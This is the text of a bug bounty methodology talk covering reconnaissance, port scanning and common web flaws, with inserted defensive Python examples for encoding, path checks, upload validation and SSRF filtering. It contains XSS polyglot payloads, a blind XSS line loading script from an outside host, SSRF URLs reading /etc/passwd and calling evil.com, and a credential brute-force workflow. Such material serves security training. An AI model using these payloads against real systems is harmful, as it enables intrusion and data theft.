whoami
Jason Haddix
● Bugcrowd
● Director of Technical Ops
● Hacker & Bug hunter
● #1 on all-time leaderboard bugcrowd 2014
@jhaddix
What this talk’s about...
Hack
Stuff
Better
(and practically)
And…LOTS of memes…. only some are funny
More Specifically
Step 1: Cut a hole in a box... j/k
Differences from standard testing
Single-sourced:
● looking mostly for common-ish vulns
● not competing with others
● incentivized for count
● payment based on sniff test
Crowdsourced:
● looking for vulns that aren’t as easy to find
● racing vs. time
● competitive vs. others
● incentivized to find unique bugs
● payment based on impact not number of findings
The regular methodologies
Discovery
Find the road less traveled
^ means find the application (or parts of an application) less tested.
1. *.acme.com scope is your friend
2. Find domains via Google (and others!)
a. Can be automated well via recon-ng and other tools.
3. Port scan for obscure web servers or services (on all domains)
4. Find acquisitions and the bounty acquisition rules
a. Google has a 6 month rule
5. Functionality changes or re-designs
6. Mobile websites
7. New mobile app versions
Tool: Recon-ng script (enumall.sh)
https://github.com/jhaddix/domain
LMGTFY
https://www.facebook.com/notes/phwd/facebook-bug-bounties/707217202701640
Port Scanning!
Port scanning is not just for Netpen!
A full port scan of all your new found targets will usually
yield #win:
● separate webapps
● extraneous services
● Facebook had Jenkins Script console with no auth
● IIS.net had rdp open vulnerable to MS12_020
Mapping tips
● Google
● *Smart* Directory Brute Forcing
○ RAFT lists (included in Seclists)
○ SVN Digger (included in Seclists)
○ Git Digger
● Platform Identification:
○ Wappalyzer (Chrome)
○ Builtwith (Chrome)
○ retire.js (cmd-line or Burp)
○ Check CVE’s
● Auxiliary
○ WPScan
○ CMSmap
Directory Bruteforce Workflow
After bruteforcing, look for other status codes indicating you are denied or require auth, then append the wordlist at that path to test for misconfigured access control.
Intrigue
New OSINT/Mapping project, intrigue:
Intrigue and Maps projects
Crawling
Using + Ruby + Anemone + JSON + Grep
https://test_target/redirect/?url=http://twitter.com/...
https://test_target/redirect/?url=http://facebook.com/...
https://test_target/redirect/?url=http://pinterest.com/...
Intrigue Tasks
Using + Ruby + Anemone + JSON + Grep
● Brute force
● Spider
● Nmap
● etc
Auth and Session
Auth (better be quick)
Auth Related (more in logic, priv, and transport sections)
Session (better be quick)
Session Related
Tactical Fuzzing - XSS
XSS
Core Idea: Does the page functionality display something to the users?
XSS
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Multi-context, filter bypass based polyglot payload #1 (Rsnake XSS Cheat Sheet)
XSS
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
Multi-context, filter bypass based polyglot payload #2 (Ashar Javed XSS Research)
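The two polyglots above work because one string is dropped into several output contexts at once. The example below is added here and is not from the slides: it takes polyglot #1 as sample input, renders it into three hypothetical templates (text node, quoted attribute, JS string literal) with and without a context-specific encoder, and checks which renderings still contain a live tag or handler. The templates and the `breaks_out` heuristic are assumptions made for this example.

```python
import html
import json

# Polyglot #1 from the slide (Rsnake XSS Cheat Sheet), used here as the sample input.
POLYGLOT = ("';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"
            "\";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--"
            "></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>")

# Three sink contexts the polyglot targets at once (hypothetical templates for this example).
TEMPLATES = {
    "body": "<p>Search results for {{v}}</p>",
    "attr": '<input value="{{v}}">',
    "js": "<script>var q = {{v}};</script>",
}


def render_unsafe(context, value):
    """The 'before': user input dropped into the template verbatim."""
    return TEMPLATES[context].replace("{{v}}", value)


def encode_for_html(value):
    # html.escape covers & < > " ' which is enough for text nodes and quoted attributes
    return html.escape(value, quote=True)


def encode_for_js_string(value):
    # json.dumps yields a valid double-quoted JS string literal; escaping < and > as well means
    # the literal can never contain </script> or open a tag if it is later written via innerHTML.
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def render_safe(context, value):
    """The 'after': one encoder per context, chosen by where the value lands."""
    encoded = encode_for_js_string(value) if context == "js" else encode_for_html(value)
    return TEMPLATES[context].replace("{{v}}", encoded)


def breaks_out(context, rendered):
    """Heuristic check (an assumption of this example): a <script> beyond the one the JS
    template owns, an event handler, or a marquee means the payload escaped its context."""
    r = rendered.lower()
    scripts_allowed = 1 if context == "js" else 0
    return r.count("<script") > scripts_allowed or "onerror=" in r or "<marquee" in r


def audit(value):
    """Per context: (unsafe rendering breaks out?, safe rendering breaks out?)."""
    return {c: (breaks_out(c, render_unsafe(c, value)), breaks_out(c, render_safe(c, value)))
            for c in TEMPLATES}


if __name__ == "__main__":
    for context, (unsafe, safe) in audit(POLYGLOT).items():
        print("%-4s unsafe=%s safe=%s" % (context, unsafe, safe))
```

The point the check makes is that there is no single "XSS filter" that neutralises a polyglot; the value has to be encoded for the context it is written into, and the JS-string case needs a different encoder from the HTML cases.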
Other XSS Input Vectors
URI based
Common Params:
\%22})))}catch(e){alert(document.domain);}//
"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//
"a")(({type:"ready"}));}catch(e){alert(1)}//
SWF Parameter XSS
Tactical Fuzzing - SQLi
SQL Injection
Core Idea: Does the page look like it might need to call on stored data?
Works in single quote context, works in double quote context, works in “straight into query” context! (Mathias Karlsson)
SQL Injection
You can also leverage the large database of fuzzlists from Seclists here:
SQL Injection Observations
Common Parameters or Injection points: ID
Blind is predominant, Error based is highly unlikely.
Best SQL injection resources
DBMS Specific Resources
mySQL: PentestMonkey's mySQL injection cheat sheet; Reiners mySQL injection Filter Evasion Cheatsheet
MSSQL: EvilSQL's Error/Union/Blind MSSQL Cheatsheet; PentestMonkey's MSSQL SQLi injection Cheat Sheet
ORACLE: PentestMonkey's Oracle SQLi Cheatsheet
Local file inclusion
Core Idea: Does it (or can it) interact with the server file system?
Liffy is new and cool here but you can also use Seclists.
Common Parameters or Injection points:
file=
location=
locale=
path=
display=
load=
read=
retrieve=
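The parameters listed above are the ones that end up opening files. As an added example (not from the slides), here is the defence that decides whether a `file=`-style value is allowed: resolve the requested name under a base directory and refuse anything that lands outside it. The helper names, the temporary directory and its two files are all constructed for this example.

```python
import os
import tempfile


def resolve_under(base_dir, user_path):
    """Return the real path of user_path inside base_dir, or None if it escapes the base."""
    base = os.path.realpath(base_dir)
    # os.path.join discards base when user_path is absolute, so /etc/passwd is caught below
    candidate = os.path.realpath(os.path.join(base, user_path))
    # realpath collapses '..' and follows symlinks, so a prefix check on the result is sound
    if candidate == base or candidate.startswith(base + os.sep):
        return candidate
    return None


def read_user_file_unsafe(base_dir, user_path):
    """The 'before': the parameter value is joined straight onto the directory."""
    with open(os.path.join(base_dir, user_path)) as f:
        return f.read()


def read_user_file_safe(base_dir, user_path):
    """The 'after': only regular files that resolve under base_dir are served."""
    p = resolve_under(base_dir, user_path)
    if p is None or not os.path.isfile(p):
        raise PermissionError("refused: %r is not a file under %s" % (user_path, base_dir))
    with open(p) as f:
        return f.read()


def build_demo_dir():
    """Constructed layout: <root>/docs/help.txt is public, <root>/secret.txt is not."""
    root = tempfile.mkdtemp()
    docs = os.path.join(root, "docs")
    os.mkdir(docs)
    with open(os.path.join(docs, "help.txt"), "w") as f:
        f.write("public help text")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("db password")   # stands in for the /etc/passwd of the LFI write-ups
    return root, docs


if __name__ == "__main__":
    root, docs = build_demo_dir()
    print(read_user_file_unsafe(docs, "../secret.txt"))      # the traversal works
    try:
        read_user_file_safe(docs, "../secret.txt")
    except PermissionError as e:
        print(e)                                             # and is refused here
```

Checking the resolved path rather than the input string is what matters: filters that only strip `../` from the parameter are exactly what Liffy-style tools are built to get past.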
Malicious File Upload ++
This is an important and common attack vector in this type of testing
Attacks:
● Upload unexpected file format to achieve code exec (swf, html, php, php3, aspx, ++) Web shells or...
● Execute XSS via same types of files. Images as well!
● Attack the parser to DoS the site or XSS via storing payloads in metadata or file header
● Bypass security zones and store malware on target site via file polyglots
Malicious File Upload ++
File upload attacks are a whole presentation. Try this one to get a feel for bypass techniques:
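The four attacks listed above map onto four checks an upload handler has to make. As an added example (not from the slides), the validator below checks every extension in the name (so `shell.php.png` is caught), compares the declared type with the file's magic bytes, and scans the body for embedded active content, which is the polyglot case. The magic table, the heuristic content check and the sample files are constructed for this example.

```python
# Magic bytes for the image types this hypothetical handler accepts (constructed table).
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
ALLOWED_EXT = set(MAGIC)

# Heuristic markers of active content hidden in an otherwise valid image (assumption of this example).
ACTIVE_MARKERS = (b"<?php", b"<script", b"<svg", b"<html")


def extensions_of(filename):
    """Every extension after the first dot, lower-cased: 'shell.php.png' -> ['php', 'png']."""
    parts = filename.lower().split(".")
    return parts[1:] if len(parts) > 1 else []


def check_upload(filename, content):
    """Return (accepted, reason). Rejects by name, by every extension, and by content."""
    exts = extensions_of(filename)
    if not exts:
        return False, "no extension"
    if any(e not in ALLOWED_EXT for e in exts):
        # 'shell.php', 'shell.php3' and 'shell.php.png' all fall here
        return False, "disallowed extension(s): %s" % ",".join(exts)
    declared = exts[-1]
    if not content.startswith(MAGIC[declared]):
        return False, "content does not match %s magic bytes" % declared
    lowered = content.lower()
    if any(marker in lowered for marker in ACTIVE_MARKERS):
        return False, "active content embedded in image body (metadata/trailer polyglot)"
    return True, "ok"


if __name__ == "__main__":
    samples = [
        ("avatar.png", MAGIC["png"] + b"\x00" * 16),
        ("shell.php", b"<?php phpinfo(); ?>"),
        ("shell.php.png", MAGIC["png"] + b"\x00" * 16),
        ("fake.png", b"<html><script>alert(1)</script>"),
        ("poly.gif", b"GIF89a" + b"\x00" * 8 + b"<?php echo 1; ?>"),
    ]
    for name, body in samples:
        print(name, check_upload(name, body))
```

Even with all four checks, the stored file should be served from a path that the web server never executes and with a fixed `Content-Type`, because the validator above cannot see how the file will later be interpreted.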
Remote file includes and redirects
Look for any param with another web address in it. Same params from LFI can present here too.
Redirections Common Parameters or Injection points:
dest=
File=
document=
Folder=
root=
Path=
pg=
style=
pdf=
template=
php_path=
doc=
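The Crawling slide earlier (Ruby + Anemone + JSON + grep pulling out `redirect/?url=http://twitter.com/...` links) and the parameter list above are the same triage step: scan every crawled URL for a parameter whose name is on the list or whose value is itself a URL or path. The example below is added here and is not the slides' Ruby script; it does that triage in Python over a constructed set of crawled URLs. The parameter names come from the LFI, redirect and SSRF slides; the sample URLs are constructed.

```python
from urllib.parse import urlsplit, parse_qsl

# Parameter names taken from the LFI, redirect and SSRF slides, lower-cased for matching.
SUSPECT_PARAMS = {
    "file", "location", "locale", "path", "display", "load", "read", "retrieve",
    "dest", "document", "folder", "root", "pg", "style", "pdf", "template", "php_path", "doc",
    "url", "redirect", "uri",
}

# Constructed sample of URLs a spider might collect from test_target.
CRAWLED = [
    "https://test_target/redirect/?url=http://twitter.com/acme",
    "https://test_target/redirect/?url=http://facebook.com/acme",
    "https://test_target/view?page=about",
    "https://test_target/download?file=../../etc/passwd",
    "https://test_target/theme?style=https://cdn.example/dark.css",
    "https://test_target/search?q=http://example.com",
]


def looks_like_url_or_path(value):
    v = value.lower()
    return v.startswith(("http://", "https://", "//", "/")) or "../" in v or "://" in v


def triage_params(urls):
    """One record per (url, param) whose name is on the list or whose value is a URL/path."""
    hits = []
    for u in urls:
        parts = urlsplit(u)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            why = []
            if name.lower() in SUSPECT_PARAMS:
                why.append("param name")
            if looks_like_url_or_path(value):
                why.append("value is URL/path")
            if why:
                hits.append({"url": u, "param": name, "value": value, "why": why})
    return hits


def external_targets(hits):
    """Hosts the redirect-style parameters currently point at (the twitter/facebook pattern);
    anything outside this set being accepted is what an open-redirect check looks for."""
    hosts = set()
    for h in hits:
        host = urlsplit(h["value"]).hostname
        if host:
            hosts.add(host)
    return sorted(hosts)


if __name__ == "__main__":
    found = triage_params(CRAWLED)
    for h in found:
        print(h["param"], "=", h["value"], "->", ", ".join(h["why"]))
    print("external targets:", external_targets(found))
```

The name list and the value shape are checked independently on purpose: `q=http://example.com` is not on any list but still carries a URL, and `file=../../etc/passwd` is on the list and carries a traversal, so each catches what the other misses.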
CSRF
Everyone knows CSRF but the TLDR here is find sensitive functions and attempt to CSRF.
Many sites will have CSRF protection, focus on CSRF bypass!
Common bypasses:
Step 1: Enable logging in Burp. Crawl a site with Burp completely executing all functions.
Step 3: Run burpy on Burp log file..
Logic:
https://github.com/arvinddoraiswamy/mywebappscripts/blob/master/BurpExtensions/csrf_token_detect.py
CSRF Common Critical functions
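The "Logic" the slide points at (csrf_token_detect.py) is the first half of the workflow: walk everything the crawl recorded and flag state-changing forms that carry no token at all. As an added example (not the linked script), here is that detection over a constructed page with three forms; the token-name hints and the sample HTML are assumptions of this example.

```python
from html.parser import HTMLParser

# Constructed sample page: one protected POST form, one unprotected POST form, one GET search form.
SAMPLE_HTML = """
<form id="change-email" method="POST" action="/account/email">
  <input type="hidden" name="csrf_token" value="8f3a...">
  <input name="email"><button>Save</button>
</form>
<form id="delete-user" method="post" action="/admin/delete">
  <input name="user_id"><button>Delete</button>
</form>
<form id="search" method="GET" action="/search"><input name="q"></form>
"""

# Substrings that usually identify an anti-CSRF field (heuristic, an assumption of this example).
TOKEN_NAME_HINTS = ("csrf", "xsrf", "token", "authenticity", "nonce")


class FormCollector(HTMLParser):
    """Collects each <form> with its method and its <input> (type, name) pairs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"id": a.get("id", ""), "method": (a.get("method") or "get").upper(),
                             "action": a.get("action", ""), "fields": []}
        elif tag == "input" and self._current is not None:
            self._current["fields"].append(((a.get("type") or "text").lower(), a.get("name", "")))

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def has_token_field(form):
    return any(t == "hidden" and any(h in n.lower() for h in TOKEN_NAME_HINTS)
               for t, n in form["fields"])


def unprotected_forms(html_text):
    """Ids of forms that change state (non-GET) and carry no recognisable anti-CSRF field."""
    p = FormCollector()
    p.feed(html_text)
    return [f["id"] for f in p.forms if f["method"] != "GET" and not has_token_field(f)]


if __name__ == "__main__":
    print("state-changing forms without a token:", unprotected_forms(SAMPLE_HTML))
```

A token field being present is only evidence that protection was attempted; whether the server actually validates it is the second half of the workflow and is checked per request in Burp, not from the HTML.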
Privilege, Transport, Logic
Privilege
Often logic, priv, auth bugs are blurred.
Privilege
1. Find site functionality that is restricted to certain user types
2. Try accessing those functions with lesser/other user roles
3. Try to directly browse to views with sensitive information as a lesser priv user
Common Functions or Views:
Add user function
Delete user function
start project / campaign / etc function
change account info (pass, CC, etc) function
Burp plugin workflow:
1. Browse using high priv user
2. Login with a lower priv user
3. Burp Plugin re-requests to see if low priv can access high priv
Insecure direct object references
IDORs are common place in bounties, and hard
to catch with scanners.
Receipts
Transport
Most security concerned sites will enable HTTPs. It’s your job to ensure they’ve done it EVERYWHERE. Most of the time they miss something.
Examples:
https://github.com/arvinddoraiswamy/mywebappscripts/tree/master/ForceSSL
Logic
Logic flaws that are tricky, mostly manual:
Mobile
Data Storage
Quick spin-up for iOS
Daniel Mayer's idb tool:
Logs!
Auxiliary
The vulns formerly known as “noise”
● Content Spoofing or HTML injection
● Referer leakage
● security headers
● path disclosure
● clickjacking
● ++
How to test a web app in n minutes
How can you get maximum results within a given time window?
Data Driven Assessment (diminishing return FTW)
1. Visit the search, registration, contact, password reset, and comment forms and hit them with your polyglot strings
2. Scan those specific functions with Burp’s built-in scanner
3. Check your cookie, log out, check cookie, log in, check cookie. Submit old cookie, see if access.
4. Perform user enumeration checks on login, registration, and password reset.
5. Do a reset and see if: the password comes plaintext, uses a URL based token, is predictable, can be used multiple times, or logs you in automatically
6. Find numeric account identifiers anywhere in URL and rotate them for context change
7. Find the security-sensitive function(s) or files and see if vulnerable to non-auth browsing (idors), lower-auth browsing, CSRF, CSRF protection bypass, and see if they can be done over HTTP.
8. Directory brute for top short list on SecLists
9. Check upload functions for alternate file types that can execute code (xss or php/etc/etc)
~ 15 minutes
Things to take with you…
1. Crowdsourced testing is different enough to pay attention to
2. Crowdsourcing focuses on the 20% because the 80% goes quick
3. Data analysis can yield the most successfully attacked areas
4. A 15 minute web test, done right, could yield a majority of your critical vulns
5. Add polyglots to your toolbelt
6. Use SecLists to power your scanners
7. Remember to periodically refresh your game with the wisdom of other techniques and other approaches
Gitbook project: The Bug Hunters Methodology
This preso ended up to be way too much to fit in a 45min talk so... we turned it into a Git project! (if you are reading this from the Defcon DVD check my twitter or Github for linkage)
Meme Count: 13
Attribution and Thanks
Tim Tomes - Recon-ng
Joe Giron - RFI params
Soroush Dalili - File in the Hole preso
Mathias Karlsson - polyglot research
Ashar Javed - polyglot/xss research
Ryan Dewhurst & Wpscan Team
Bitquark - for being a ninja, bsqli string
rotlogix - liffy LFI scanner
Arvind Doraiswamy - HTTPs, CSRF Burp Plugins
Barak Tawily - Autorize burp plugin
the RAFT list authors
Ferruh Mavituna - SVNDigger
Jaime Filson aka wick2o - GitDigger
Robert Hansen aka rsnake - polyglot / xss
Dan Crowley - polyglot research
Daniel Miessler - methodology, slide, and data contributions
My awesome team at Bugcrowd (Jon, Tod, Shpend, Ben, Grant, Fatih, Patrik, Kati, Kym, Abby, Casey, Chris, Sam, ++)
All the bug hunting community!!!
Domain Discovery
Expanding your scope like a boss
whoami
Tools: Builtwith, Wappalyzer, Vulners Burp Plugin, Gobuster, Parameth, Burp Wordlists, Burp analyze target, spider, Github, ++
ASN’s
★ https://whois.arin.net/ui/query.do
★ https://apps.db.ripe.net/db-web-ui/#/fulltextsearch
Rev whois
★ http://viewdns.info/
★ http://domainbigdata.com/
★ https://reverse.report/
Acquisitions
★ Crunchbase
★ Protected by distil bot protection
★ Stay tuned
Shodan Organization
★ https://www.shodan.io/search?query=org%3A%22Tesla+Motors%22
Others
crt.sh
ThreatCrowd
Virustotal
★ Cloudflare
★ Censys.io
★ Haven't tested but love the ideas
Sub Bruting
all.txt
https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
Permutation Scanning
Altdns : https://github.com/infosec-au/altdns
https://github.com/jfrancois/SDBF
https://www.foo.be/papers/sdbf.pdf
Port Scanning
65536 unverified Hosts (a large target's ASN)
Tool | Time to run | Found
masscan (You can use a conf file for this!) | 11m4.164s | 196
nmap | zzz | ∞
masscan command:
masscan -p1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389,280,4567,7001,8008,9080 -iL $TARGET_LIST --max-rate 100000 -oG $TARGET_OUTPUT
Visual Identification
★ Because of the nature of scraping and dns redirects some sites will
be gone or the same.
★ Gotta get an idea of what is up and unique
★ We also don’t know what protocol these are on (http vs https, ++)
Auxiliary
★ Dnssec / nsec / nsec3 walking
○ Ldnsutils, nsec3walker, nsec3map
★ Github recon
○ Search for goodies
○ https://github.com/appsecco/bugcrowd-levelup-subdomain-enumeration/blob/master/esoteric_subdomain_enumeration_techniques.pdf
★ Burp suite scope filters
○ https://www.youtube.com/watch?v=1Kg0_53ZEq8
○ Simple and effective
○ Start with target, spider, scope down to keywords, repeat
★ Dorking: ads key, priv pol, tos, aws, s3
Linked Discovery - BURP SUITE (DEMO)
Platform Identification
and CVE searching
Content Discovery /
Directory Bruting
★ Gobuster
★ Burp content discovery
★ Robots disallowed
★ ¯\_(ツ)_/¯
Parameter Bruting?
★ Yep! - Untested but love the idea
★ Can be combined with backslash scanners top 2500 params
Automation?
★ Somewhat
★ Best-in-breed tools/sites change,
automation needs to support bespoke tooling
★ HODOR:
○ A security testing Slackbot built with a
Kubernetes backend on the Google Cloud
Platform
★ Kubebot:
○ A security testing Slackbot built with a
Kubernetes backend on the Google Cloud
Platform
★ Assetnote
★ Datasploit & intrigue
QUICK BASH WINS (hostme.sh)
QUICK BASH WINS (rundns.sh)
QUICK BASH WINS (bust.sh)
QUICK BASH WINS (mass.sh)
QUICK BASH WINS (certspotter.sh)
Ty Jobert!
The Bug Hunters
Methodology v2.1
whoami
Hack
Stuff
Better
(and practically)
And…LOTS of memes…. only some are funny
history && topics
Aka “How to Shot Web” @ DEFCON23:
★ philosophy shifts
★ discovery techniques
★ mapping methodology
★ parameters oft attacked
★ useful fuzz strings
★ bypass or filter evasion techniques
★ new/awesome tooling
★ memes
v1 topics:
★ Subdomain & Discovery
★ SQLi
★ XSS
★ File Uploads
★ CSRF
★ Privilege, Auth, IDOR
v2
★ MOAR discovery
★ xss
★ ssti
★ ssrf
★ Code Inj / cmdi / advancements in fuzzing
★ Infrastructure and config
★ WAF
★ SOAP Testing
light reading
Discovering New Targets
Discovery
Sublist3r
★ Plazmaz Fork
★ Fleetcaptain fork
Sub Scraping
ThreatCrowd
Virustotal
★ Cloudflare
★ Censys.io
★ Haven't tested but love the ideas
Sub Bruting
all.txt
https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
Acquisitions
★ Crunchbase
★ wikipedia
Port Scanning
65536 unverified Hosts (a large target's ASN)
Tool | Time to run | Found
nmap | zzz | ∞
Interlude... credential bruteforce
Brutespray: Nmap service scan (-oG) or masscan output → Brutespray credential bruteforce
Visual Identification
★ Gobuster
★ Burp content discovery
★ Robots disallowed
★ ¯\_(ツ)_/¯
CommonSpeak and Scans.io data
★ Subdomain data is awesome
Parameter Bruting?
★ Yep! - Untested but love the idea
★ Can be combined with backslash scanners top 2500 alexa params
Workflow:
1. Identify IPs and main TLDs: ASNs, Reverse Whois, Acquisitions, ++
2. Domain scraping for discovered TLDs: enumall, sublist3r, Manual
3. Domain bruteforcing, Resolve && add new IP ranges: Massdns, ++
4. Portscan: masscan
5. Visual Identification: eyewitness
Blind XSS (diagram):
1. Jamie: I really enjoy my super admin access this morning !!!
2. Frans: I really enjoy my NEW super admin access this morning !!! “><script src=//y.vg></script>
3. Y.vg is a javascript shell !!#!
XSSHunter
Payload:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Jackmasa’s XSS Mindmap
https://github.com/jhaddix/XSS.png
Server Side Template Injection
SSTI
TBHMv1: ❏ Nothing
Common parameters: preview, redirect, id, view, activity, name
http://acme.com/script?name={{2*3}}
Server Side Request Forgery
TBHMv1: ❏ Nothing ❏ Well kinda... SSRF
★ Where? Common Parameters or Injection points from TBHMv1: file= folder= location= style=
★ Resources
○ SSRF Bible (black magic)
http://ACME.com/redirect.php?url=file:///etc/passwd
http://acme.com/ssrf.php?url=tftp://evil.com:12346/TESTPACKET
SSRF Resources
★ protocol and schema mappings
★ Exploit examples
Server Side Request Forgery
Parameters: dest {regex + perm}, redirect {regex}, uri {regex + perm}, path {regex}, port {regex}
http://acme.com/script?uri=ftp://site
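The three URLs above show the two things an SSRF sink has to refuse: schemes other than http(s) (`file://`, `tftp://`, `ftp://`) and destinations that are not public. As an added example (not from the slides), here is a validator for a `url=`/`uri=`-style parameter that checks the scheme, resolves the host, and rejects any address that is private, loopback, link-local or otherwise non-routable, including hosts whose record list mixes a public and a private address. DNS is replaced by a constructed lookup table so the example runs offline; the sample addresses are made up.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed resolver results standing in for DNS (sample values, not real hosts).
FAKE_DNS = {
    "cdn.example": ["1.2.3.4"],
    "internal.corp.example": ["10.0.0.5"],
    "metadata.example": ["169.254.169.254"],
    "dual.example": ["1.2.3.5", "127.0.0.1"],   # public + loopback: must be refused
}

ALLOWED_SCHEMES = {"http", "https"}


def is_public(ip):
    a = ipaddress.ip_address(ip)
    return a.is_global and not a.is_multicast


def validate_outbound_url(url, resolve=lambda host: FAKE_DNS.get(host, [])):
    """Return (ok, reason) for a URL the server is about to fetch on the user's behalf."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "no host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        addrs = [str(ipaddress.ip_address(host))]   # literal IPv4/IPv6 address
    except ValueError:
        addrs = resolve(host)                        # hostname: every record counts
    if not addrs:
        return False, "host does not resolve"
    bad = [a for a in addrs if not is_public(a)]
    if bad:
        return False, "resolves to non-public address %s" % bad[0]
    return True, "ok"


if __name__ == "__main__":
    for u in ["https://cdn.example/img.png", "file:///etc/passwd",
              "tftp://evil.com:12346/TESTPACKET", "http://metadata.example/latest/",
              "http://dual.example/", "http://127.0.0.1:8080/"]:
        print(u, "->", validate_outbound_url(u))
```

Checking every resolved record, not just the first, is what catches the dual-record case; the client should then connect to the address it validated rather than resolving the name a second time, otherwise a changed answer between check and use would get through.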
Code Inj, CDMi, & Future Fuzzing, ++
Code Injection + CMD Injection + New Fuzzing
TBHMv1: ❏ Sqli ❏ Polyglot ❏ Seclists ❏ Sqlmap ❏ Params ❏ Tooling ❏ resources
★ Commix
